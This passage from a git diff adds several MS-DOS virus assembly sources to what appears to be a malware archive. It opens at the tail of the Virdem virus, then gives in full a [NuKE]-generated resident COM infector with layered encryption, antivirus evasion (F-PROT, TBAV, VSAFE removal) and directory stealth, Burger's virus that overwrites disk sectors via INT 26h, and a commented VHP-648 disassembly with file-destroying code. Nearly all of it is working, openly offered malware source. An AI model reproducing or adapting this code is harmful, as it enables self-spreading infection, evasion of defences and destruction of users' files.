ah=function 3Bh + ; set current dir, path @ ds:dx + ret +sub_2 endp + + +; +; SUBROUTINE +; +; Called from: 8C04:024C +; + +sub_3 proc near + mov ah,42h ; 'B' + mov al,0 + mov dx,500h + nop + + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + ret +sub_3 endp + + db 0 +data_5 dw 0 ; xref 8C04:0120, 0193, 01BE, 01C4 + ; 01D6 +data_6 dw 600h ; xref 8C04:015D, 026A, 0274 + db "*.com", 00h + db 2Ah, 00h,0FFh, 00h, 00h, 00h + db 00h, 00h, 3Fh, 00h + db "????????exe" + db 00h, 00h, 00h + db 00h, 00h + db "????????com" + db 33 dup (0) + db 5Ch, 00h +data_10 db 0 ; xref 8C04:0139, 0370 + db 5Ch + db 33 dup (0) + db 'Virdem Ver.: 1.06' + + +data_12 db ' (Generation 0) aktive.', 0Ah, 0Dh + +copyright db 'Copyright by R.Burger 1986,1987' + db 0Ah, 0Dh, 'Phone.: D - 05932/5451' + db ' ', 0Ah, 0Dh, ' ', 0Ah, 0Dh, 'T' + db 'his is a demoprogram for ', 0Ah, 0Dh + db 'computerviruses. Please put in a' + db ' ', 0Ah, 0Dh, 'number now.', 0Ah + db 0Dh, 'If you', 27h, 're right, yo' + db 'u', 27h, 'll be', 0Ah, 0Dh, 'abl' + db 'e to continue.', 0Ah, 0Dh, 'The ' + db 'number is between ', 0Ah, 0Dh, '0' + db ' and ', 0 + db 0Ah, 0Dh, 'Sorry, you', 27h, 're ' + db 'wrong', 0Ah, 0Dh, ' ', 0Ah + db 0Dh, 'More luck at next try ....', 0Ah + db 0Dh, 0 + db 0Ah, 0Dh, 'Famous. You', 27h, 're' + db ' right.', 0Ah, 0Dh, 'You', 27h, 'l' + db 'l be able to continue. ', 0Ah, 0Dh + db 0 + db 0Ah, 0Dh, 'All your programs are', 0Ah + db 0Dh, 'struck by VIRDEM.COM now.', 0Ah + db 0Dh + db 0 + +seg_a ends + + end start + + CROSS REFERENCE - KEY ENTRY POINTS + + seg:off type label + ---- ---- ---- --------------- + 8C04:0100 far start + + Interrupt Usage Synopsis + + Interrupt 21h : terminate, cs=progm seg prefx + Interrupt 21h : display char dl + Interrupt 21h : clear keybd buffer & input al + Interrupt 21h : set default drive dl (0=a:) + Interrupt 21h : get default drive al (0=a:) + Interrupt 21h : get time, cx=hrs/min, dh=sec + Interrupt 21h : get DTA ptr into es:bx + Interrupt 21h : set current dir, path @ ds:dx + Interrupt 21h : open file, al=mode,name@ds:dx + Interrupt 21h : close file, bx=file handle + Interrupt 21h : read file, cx=bytes, to ds:dx + Interrupt 21h : write file cx=bytes, to ds:dx + Interrupt 21h : move file ptr, cx,dx=offset + Interrupt 21h : get/set file attrb, nam@ds:dx + Interrupt 21h : get present dir,drive dl,1=a: + Interrupt 21h : find 1st filenam match @ds:dx + Interrupt 21h : find next filename match + Interrupt 21h : get/set file date & time + + I/O Port Usage Synopsis + + No I/O ports used. + diff --git a/MSDOS/Virus.MSDOS.Unknown.virus.asm b/MSDOS/Virus.MSDOS.Unknown.virus.asm new file mode 100644 index 00000000..50ed3ede --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus.asm @@ -0,0 +1,473 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +sub byte ptr [di],059h +xor word ptr [di],0cb6fh +not word ptr [di] +inc byte ptr [di] +add byte ptr [di],03fh +xor word ptr [di],01bd8h +sub word ptr [di],05c54h +sub word ptr [di],0ccdh +not word ptr [di] +not word ptr [di] +inc word ptr [di] +not word ptr [di] +not word ptr [di] +inc byte ptr [di] +sub word ptr [di],0f965h +inc word ptr [di] +sub byte ptr [di],072h +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!### +;----------------------------------------------------------- +mov ah,0bh ;######### BYE BYE TBAV ! ########## +int 21h ;### (CANGE INT AT YOU PLEASURE) ### +;---------------------------------------------------------- +loop deci ;repeat please! + ; +;***************************************************************** +; #2 DECRYPT ROUTINE +;***************************************************************** + ; +crypt: ;fuck label! + ; +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt2] + bp ;di = first byte to decrypt +;--------------------------------------------------------------- +deci2: ; +xor byte ptr cs:[di],1 ;decrytion rutine +inc di ;very simple... +loop deci2 ; +;--------------------------------------------------------------- +crypt2: ;fuck label! + ; +MOV AX,0CACAH ;call to my resident interrup mask +INT 21H ;for chek "I'm is residet?" +CMP Bh,0CAH ;is equal to CACA? +JE PUM2 ;yes! jump to runnig program +call action +;***************************************************************** +; NRLG FUNCTIONS (SELECTABLE) +;***************************************************************** + +call ANTI_V +;**************************************************************** +; PROCESS TO REMAIN RESIDENT +;**************************************************************** + +mov ax,3521h +int 21h ;store the int 21 vectors +mov word ptr [bp+int21],bx ;in cs:int21 +mov word ptr [bp+int21+2],es ; +;--------------------------------------------------------------- +push cs ; +pop ax ;ax = my actual segment +dec ax ;dec my segment for look my MCB +mov es,ax ; +mov bx,es:[3] ;read the #3 byte of my MCB =total used memory +;--------------------------------------------------------------- +push cs ; +pop es ; +sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus +sub bx,17 + offset fin ;and 100H for the PSP total +mov ah,4ah ;used memory +int 21h ;put the new value to MCB +;--------------------------------------------------------------- +mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin +mov ah,48h ; +int 21h ;request the memory to fuck DOS! +;--------------------------------------------------------------- +dec ax ;ax=new segment +mov es,ax ;ax-1= new segment MCB +mov byte ptr es:[1],8 ;put '8' in the segment +;-------------------------------------------------------------- +inc ax ; +mov es,ax ;es = new segment +lea si,[bp + offset start] ;si = start of virus +mov di,100h ;di = 100H (psp position) +mov cx,offset fin - start ;cx = lag of virus +push cs ; +pop ds ;ds = cs +cld ;mov the code +rep movsb ;ds:si >> es:di +;-------------------------------------------------------------- +mov dx,offset virus ;dx = new int21 handler +mov ax,2521h ; +push es ; +pop ds ; +int 21h ;set the vectors +;------------------------------------------------------------- +pum2: ; + ; +mov ah,byte ptr [cs:bp + real] ;restore the 3 +mov byte ptr cs:[100h],ah ;first bytes +mov ax,word ptr [cs:bp + real + 1] ; +mov word ptr cs:[101h],ax ; +;------------------------------------------------------------- +mov ax,100h ; +jmp ax ;jmp to execute + ; +;***************************************************************** +;* HANDLER FOR THE INT 21H +;***************************************************************** + ; +VIRUS: ; + ; +cmp ah,4bh ;is a 4b function? +je REPRODUCCION ;yes! jump to reproduce ! +cmp ah,11h +je dir +cmp ah,12h +je dir +dirsal: +cmp AX,0CACAH ;is ... a caca function? (resident chek) +jne a3 ;no! jump to a3 +mov bh,0cah ;yes! put ca in bh +a3: ; +JMP dword ptr CS:[INT21] ;jmp to original int 21h +ret ; +make db '[NuKE] N.R.L.G. AZRAEL' +dir: +jmp dir_s +;------------------------------------------------------------- +REPRODUCCION: ; + ; +pushf ;put the register +pusha ;in the stack +push si ; +push di ; +push bp ; +push es ; +push ds ; +;------------------------------------------------------------- +push cs ; +pop ds ; +mov ax,3524H ;get the dos error control +int 21h ;interupt +mov word ptr error,es ;and put in cs:error +mov word ptr error+2,bx ; +mov ax,2524H ;change the dos error control +mov dx,offset all ;for my "trap mask" +int 21h ; +;------------------------------------------------------------- +pop ds ; +pop es ;restore the registers +pop bp ; +pop di ; +pop si ; +popa ; +popf ; +;------------------------------------------------------------- +pushf ;put the registers +pusha ; +push si ;HEY! AZRAEL IS CRAZY? +push di ;PUSH, POP, PUSH, POP +push bp ;PLEEEEEAAAAAASEEEEEEEEE +push es ;PURIFY THIS SHIT! +push ds ; +;------------------------------------------------------------- +mov ax,4300h ; +int 21h ;get the file +mov word ptr cs:[attrib],cx ;atributes +;------------------------------------------------------------- +mov ax,4301h ;le saco los atributos al +xor cx,cx ;file +int 21h ; +;------------------------------------------------------------- +mov ax,3d02h ;open the file +int 21h ;for read/write +mov bx,ax ;bx=handle +;------------------------------------------------------------- +mov ax,5700h ; +int 21h ;get the file date +mov word ptr cs:[hora],cx ;put the hour +mov word ptr cs:[dia],dx ;put the day +and cx,word ptr cs:[fecha] ;calculate the seconds +cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX) +jne seguir ;yes! the file is infected! +jmp cerrar ; +;------------------------------------------------------------ +seguir: ; +mov ax,4202h ;move the pointer to end +call movedor ;of the file +;------------------------------------------------------------ +push cs ; +pop ds ; +sub ax,3 ;calculate the +mov word ptr [cs:largo],ax ;jmp long +;------------------------------------------------------------- +mov ax,04200h ;move the pointer to +call movedor ;start of file +;---------------------------------------------------------- +push cs ; +pop ds ;read the 3 first bytes +mov ah,3fh ; +mov cx,3 ; +lea dx,[cs:real] ;put the bytes in cs:[real] +int 21h ; +;---------------------------------------------------------- +cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ? +jne er1 ;yes! is a EXE... fuckkk! +;---------------------------------------------------------- +jmp cerrar +er1: +;---------------------------------------------------------- +mov ax,4200h ;move the pointer +call movedor ;to start fo file +;---------------------------------------------------------- +push cs ; +pop ds ; +mov ah,40h ; +mov cx,1 ;write the JMP +lea dx,[cs:jump] ;instruccion in the +int 21h ;fist byte of the file +;---------------------------------------------------------- +mov ah,40h ;write the value of jmp +mov cx,2 ;in the file +lea dx,[cs:largo] ; +int 21h ; +;---------------------------------------------------------- +mov ax,04202h ;move the pointer to +call movedor ;end of file +;---------------------------------------------------------- +push cs ; +pop ds ;move the code +push cs ;of my virus +pop es ;to cs:end+50 +cld ;for encrypt +mov si,100h ; +mov di,offset fin + 50 ; +mov cx,offset fin - 100h ; +rep movsb ; +;---------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus +enc: ; +xor byte ptr cs:[di],1 ;encrypt the virus +inc di ;code +loop enc ; +;--------------------------------------------------------- +mov cx,offset fin +mov di,offset fin + 50 + (offset crypt - offset start) ;virus +mov dx,1 +enc2: ; + +add byte ptr [di],072h +dec word ptr [di] +add word ptr [di],0f965h +dec byte ptr [di] +not word ptr [di] +not word ptr [di] +dec word ptr [di] +not word ptr [di] +not word ptr [di] +add word ptr [di],0ccdh +add word ptr [di],05c54h +xor word ptr [di],01bd8h +sub byte ptr [di],03fh +dec byte ptr [di] +not word ptr [di] +xor word ptr [di],0cb6fh +add byte ptr [di],059h +inc di +inc di ;the virus code +loop enc2 ; +;-------------------------------------------- +mov ah,40h ; +mov cx,offset fin - offset start ;copy the virus +mov dx,offset fin + 50 ;to end of file +int 21h ; +;---------------------------------------------------------- +cerrar: ; + ;restore the +mov ax,5701h ;date and time +mov cx,word ptr cs:[hora] ;file +mov dx,word ptr cs:[dia] ; +or cx,word ptr cs:[fecha] ;and mark the seconds +int 21h ; +;---------------------------------------------------------- +mov ah,3eh ; +int 21h ;close the file +;---------------------------------------------------------- +pop ds ; +pop es ;restore the +pop bp ;registers +pop di ; +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +pusha ; + ; +mov ax,4301h ;restores the atributes +mov cx,word ptr cs:[attrib] ;of the file +int 21h ; + ; +popa ; +;---------------------------------------------------------- +pushf ; +pusha ; 8-( = f-prot +push si ; +push di ; 8-( = tbav +push bp ; +push es ; 8-) = I'm +push ds ; +;---------------------------------------------------------- +mov ax,2524H ; +lea bx,error ;restore the +mov ds,bx ;errors handler +lea bx,error+2 ; +int 21h ; +;---------------------------------------------------------- +pop ds ; +pop es ; +pop bp ;restore the +pop di ;resgisters +pop si ; +popa ; +popf ; +;---------------------------------------------------------- +JMP A3 ;jmp to orig. INT 21 + ; +;********************************************************** +; SUBRUTINES AREA +;********************************************************** + ; +movedor: ; + ; +xor cx,cx ;use to move file pointer +xor dx,dx ; +int 21h ; +ret ; +;---------------------------------------------------------- +all: ; + ; +XOR AL,AL ;use to set +iret ;error flag + +;*********************************************************** +; DATA AREA +;*********************************************************** +largo dw ? +jump db 0e9h +real db 0cdh,20h,0 +hora dw ? +dia dw ? +attrib dw ? +int21 dd ? +error dd ? + +;--------------------------------- +action: ; +MOV AH,2AH ; +INT 21H ;get date +CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day? +JE cont ;nop! fuck ret +cmp byte ptr cs:[action_dia+bp],32 ; +jne no_day ; +cont: ; +cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month? +je set ; +cmp byte ptr cs:[action_mes+bp],13 ; +jne NO_DAY ;nop! fuck ret +set: ; +mov cx,50 ;50 beep's! +beep: ;beep label! +mov ax,0E07h ; +int 10h ;print beep char +loop beep ;go! +NO_DAY: ; +ret ; +;--------------------------------- + +;--------------------------------- +ANTI_V: ; +MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY +MOV DX,5945H ; +INT 21H ; +ret ; +;--------------------------------- + +;***************************************************** +dir_s: + pushf + push cs + call a3 ;Get file Stats + test al,al ;Good FCB? + jnz no_good ;nope + push ax + push bx + push es + mov ah,51h ;Is this Undocmented? huh... + int 21h + mov es,bx + cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 020H ;day for the action +action_mes Db 0dH ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.virus0b.asm b/MSDOS/Virus.MSDOS.Unknown.virus0b.asm new file mode 100644 index 00000000..3dab1e29 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus0b.asm @@ -0,0 +1,396 @@ +; Virus in Assembly Language +; -------------------------- + +;Most viruses out there have been written in assembly because assembly has the +;unique ability to bypass operating system security. +;Here is an example of a virus written under MS-DOS 2.1 and can obviously be +;compiled in the later versions. The article contains remarks so as to further +;explain the parts. Programmers may wish to delete those segments if desired. + +;************************************************** +; Program Virus +; Version 1.1 +; Writter : R. Burger +; Created 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replace itself. +; and thereby modify other programs. Enjoy. +;************************************************** + +Code Segment + Assume CS:Code +progr equ 100h + ORG progr + +;************************************************** +; The three NOP's serve as the marker byte of the +; virus which allow it to identify a virus. +;************************************************** + +MAIN: + nop + nop + nop + +;************************************************** +; Initialize the pointers +;************************************************** + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +;************************************************** +; Get the selected drive +;************************************************** + + mov ah,19h ;drive? + int 21h + +;************************************************** +; Get the current path on the current drive +;************************************************** + + mov cs:drive,al ;save drive + mov ah,47h ;dir? + mov dh,0 + add al,1 + mov dl,al ;in actual drive + lea si,cs:old_path ; + int 21h + +;************************************************** +; Get the number of drives present. If only one +; is present, the pointer for the search order +; will be set to serach order + 6 +;************************************************** + + mov as,0eh ;how many disks + mov dl,0 ; + int 21h + + mov al,01 + cmp al,01 ;one drive + jnz hups3 + mov al,06 + +hups3: mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +;************************************************** +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM files and infected. +; This causes the error message "Program to large +; to fit memory" when starting larger infected +; EXE programs. +;************************************************* + +change_disk: + jnc no_name_change + mov ah,17h ;change .EXE to .COM + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ;.EXE found? + +;**************************************************** +; If neither .COM nor .EXE is found then sectors +; will be overwritten depending on the system time +; in milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can +; find nothing more to infect and starts its destruction +;***************************************************** + + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +;****************************************************** +; Check if the end of the search order table has been +; reached . If so, end. +;****************************************************** + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +;**************************************************** +; Get new drive from the search order table and +; select it . +;*************************************************** + +hups2: + mov ah,0eh + int 21h ;change disk + +;*************************************************** +; Start in the root directory +;*************************************************** + + mov ah,3bh ;change path + lea dx,path + int 21h + jmp find_first_file + +;************************************************** +; Starting from the root, search for the first +; subdir. FIrst convert all .EXE files to .COM +; in the old directory +;************************************************** + +find_first_subdir: + mov ah,17h ;change .exe to .com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ;use root directory + lea dx,path + int 21h + mov ah,04eh ;search for first subdirectory + mov cx,00010001b ;dir mask + lea dx,maske_dir ; + int 21h ; + jc change_disk + mov bx,CS:counter + INC,BX + DEC bx + jz use_next_subdir + +;************************************************* +; Search for the next subdirectory. If no more +; directories are found, the drive will be changed. +;************************************************* + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +;************************************************* +; Select found directory. +;************************************************** + +use_next_subdir: + mov ah,2fh ;get dta address + int 21h + add bx,1ch + mov es:[bx],'\` ;address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ;change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +;************************************************** +; Find first .COM file in the current directory. +; If there are none, search the next directory. +;************************************************** + +find_first_file: + mov ah,04eh ;Search for first + mov cx,00000001b ;mask + lea dx,maske_com ; + int 21h ; + jc find_first_subdir + jmp check_if_ill + +;************************************************** +; If program is ill(infected) then search for +; another other. +;************************************************** + +find_next_file: + mov ah,4fh ;search for next + int 21h + jc find_first_subdir + +;************************************************* +; Check is already infected by virus. +;************************************************** + +check_if_ill: + mov ah,3dh ;open channel + mov al,02h ;read/write + mov dx,9eh ;address of name in dta + int 21 + mov bx,ax ;save channel + mov ah,3fh ; read file + mov ch,buflen ; + mov dx,buffer ;write in buffer + int 21h + mov ah,3eh ;close file + int 21h + +;*************************************************** +; This routine will search the three NOP's(no +; operation).If present there is already an infection. +; We must then continue the search +;**************************************************** + + mov bx,cs:[buffer] + cmp bx,9090h + jz find_next_file + +;*************************************************** +; This routine will BY PASS MS-DOS WRITE PROTECTION +; if present. Very important ! +;*************************************************** + + mov ah,43h ;write enable + mov al,0 + mov dx,9eh ;address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +;**************************************************** +; Open file for read/write access. +;***************************************************** + + mov ah,3dh ;open channel + mov al,02h ;read/write + mov dx,9eh ;address of name in dta + int 21h + +;**************************************************** +; Read date entry of program and save for future +; use. +;**************************************************** + + mov bx,ax ;channel + mov ah,57h ;get date + mov al.0 + int 21h + push cx ;save date + push dx + +;**************************************************** +; The jump located at address 0100h of the program +; will be saved for further use. +;***************************************************** + + mov dx,cs:[conta] ;save old jmp + mov cs:[jmpbuf],dx + mov dx,cs:[buffer+1] ;save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +;***************************************************** +; The virus copies itself to the start of the file. +;***************************************************** + + mov ah,57h ;write date + mov al,1 + pop dx + pop cx ;restore date + int 21h + +;***************************************************** +; Close the file. +;***************************************************** + + mov ah,3eh ;close file + int 21h + +;***************************************************** +; Restore the old jump address. The virus saves at +; address "conta" the jump which was at the start of +; the host program. +; This is done to preserve the executability of the +; host program as much as possible. +; After saving it still works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory. +;**************************************************** + + mov dx,cs:[jmpbuf] ;restore old jump + mov cs:[conta],dx +hops: nop + call use_old + +;**************************************************** +; Continue with the host program. +;**************************************************** + +cont db 0e9h ;make jump +conta dw 0 + mov ah,00 + int 21h + +;*************************************************** +; Reactivate the selected drive at the start of +; the program. +;*************************************************** + +use_old: + mov ah,0eh ;use old drive + mov dl,cs:drive + int 21h + +;*************************************************** +; Reactivate the selected path at the start of +; the program. +;*************************************************** + + mov ah,3bh ;use old drive + lea dx,old_path-1 ;get old path and backslash + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,offh +pointer dw 0000 ;pointer f. search order +counter dw 0000 ;counter f. nth. search +disks db 0 ;number of disks + +maske_com db "*.com",00 ;search for com files +maske_dir db "*",00 ;search for dir's +maske_exe db offh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db offh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e00h ;a safe place + +buflen equ 230h ;lenght of virus!!!! + ;carefull + ;if changing!!!! +jmpbuf equ buffer+buflen ;a safe place for jmp +path db "\",0 ;first place +drive db 0 ;actual drive +back_slash db "\" +old_path db 32 dup (?) ;old path + +code ends + +end main + +;[ END OF THIS VIRUS PROGRAM ] + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus2.asm b/MSDOS/Virus.MSDOS.Unknown.virus2.asm new file mode 100644 index 00000000..59911d23 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virus2.asm @@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,not 1 ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. + + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virus3.asm 